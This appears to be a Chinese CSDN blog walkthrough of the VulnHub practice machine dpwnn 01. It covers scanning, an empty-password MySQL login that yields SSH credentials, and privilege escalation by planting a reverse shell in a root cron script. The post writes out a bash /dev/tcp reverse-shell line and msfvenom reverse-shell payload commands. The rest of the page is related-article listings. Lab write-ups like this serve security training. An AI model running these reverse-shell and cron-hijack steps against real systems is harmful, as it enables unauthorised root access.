vulnhub靶机测试--dpwnn 01

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量117 收藏
点赞数
分类专栏: 渗透测试靶机实战 文章标签: 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/115145065
版权

目录

信息收集

主机发现

在这里插入图片描述

端口扫描

在这里插入图片描述
80 http服务;22 ssh;3306 MySQL。

目录扫描

在这里插入图片描述
就一个info.php

漏洞发现及利用

访问80端口:
在这里插入图片描述
访问info.php:
在这里插入图片描述
给出了phpinfo信息。但是没有什么可以利用的点。

web端其实没什么东西。

访问3306端口,连接MySQL:
在这里插入图片描述
直接弱口令(其实没有密码,直接进来。。。。。。)

正常操作,获得账号信息:
在这里插入图片描述
获得ssh账号密码。

进行连接:
在这里插入图片描述

提权

使用sudo查看suid权限的命令:
在这里插入图片描述
使用find命令,查看suid权限:
在这里插入图片描述

这个环境用不了wget,下载不了一些提权脚本:
在这里插入图片描述
查看定时任务:

/etc/crontab

在这里插入图片描述
每3分钟以root身份执行脚本。

在脚本中写入反弹shell的命令,以root身份反弹shell:

bash -i >& /dev/tcp/192.168.133.149/7777 0>&1

在这里插入图片描述
kali进行监听:
在这里插入图片描述
提权成功。

或者使用msfvenon:
在这里插入图片描述

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.133.149 LPORT=7777
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.133.149 LPORT=7777

总结

web端没有什么利用点,mysql没有密码。。确实没想到。

主要也就是了解了定时任务。

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机之dpwwn-01
timesleep的博客
10-17 357
扫描靶机IP 确定靶机IP为192.168.34.152,使用nmap扫描端口 看到靶机端口有ssh,http,mysql 首先查看http 看到http正在建设中,然后扫描一下目录 看到info.php但是对我们来说没有用然后测试一下mysq,尝试弱口令连接 果然mysql可以弱口令,密码为空然后查看一下有没有可用信息 找到了一个用户可以ssh连接接下来咱们连接 连接成功,咱们查看有...
vulnhub靶机之dawn
timesleep的博客
12-05 921
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1580
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1094
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 992
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
智能车竞赛的技术罗盘:导航技术可行性分析
08-25
智能车竞赛是一种结合了机械工程、电子工程、计算机科学和人工智能的综合性技术竞赛。参赛者通常需要设计和制造一个能够自主导航的小型车辆,使其能够在特定的环境或赛道上行驶,并完成一定的任务。以下是智能车竞赛的一些关键要素: 1. **车辆设计**:参赛队伍需要设计一个小型车辆,这可能包括车辆的机械结构、车轮、悬挂系统等。 2. **传感器集成**:智能车需要集成多种传感器,如摄像头、激光雷达(LIDAR)、超声波传感器、红外传感器等,用于环境感知。 3. **控制系统**:车辆的控制系统负责处理传感器数据,并根据算法做出决策,控制车辆的行驶方向和速度。 4. **导航算法**:参赛队伍需要开发导航算法,使车辆能够识别赛道、避开障碍物、遵循路径等。 5. **通信系统**:在某些竞赛中,车辆可能需要与外部系统通信,如接收实时数据或指令。 6. **电源管理**:智能车需要有效的电源管理系统,以确保在竞赛过程中的能源供应。 7. **编程与软件开发**:软件开发是智能车竞赛的核心部分,包括编写控制算法、数据处理程序和用户界面。 8. **团队合作**:智能车竞赛通常需要跨学科的团队合作,团队成员
ssm337基于SSM框架的高校试题管理系统+vue.zip
08-25
采用Java技术和MYSQL数据库设计开发。在系统的整个开发过程中,首先对系统进行了需求分析,设计出系统的主要功能模块,包括学生功能模块、教师功能模块以及管理员功能模块三大部分,其次对网站进行总体规划和详细设计,最后对基于SSM框架的高校试题管理系统进行了系统测试,包括测试概述,测试内容等,并对测试结果进行了分析和总结,进而得出系统的不足及需要改进的地方,为以后的系统维护和扩展提供了方便。 本系统布局合理、色彩搭配和谐、框架结构设计清晰,具有操作简单,界面清晰,管理方便,功能完善等优势,有很高的使用价值。
ant-design-4.12.0.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
基于java档案管理系统源码 档案管理系统代码(高分毕设项目源码)
08-25
1. 档案管理系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
MIMO信号检测(含MRC,ZF,ZF-SIC,MMSE,MMSE-SIC对比 误码率 QPSK)7352期】.mp4
08-25
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
缺陷检测 智能识别 深度学习 快速定位识别 智能分类 ViDi蓝色 - 特征检测 使用ViDi蓝色在您的图像中执行 功能检测和
最新发布
08-25
缺陷检测 智能识别 深度学习 快速定位识别 智能分类 ViDi蓝色 - 特征检测 使用ViDi蓝色在您的图像中执行 功能检测和 本地化。它会自动找到所有寻找的零件。 ViDi红 - 异常检测
20+项目投资建议书合集-可行性方案
08-25
20+项目投资建议书合集 项目建议书 项目建议书word+pdf
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
08-25
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描述您的求职意
ant-design-4.8.3.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值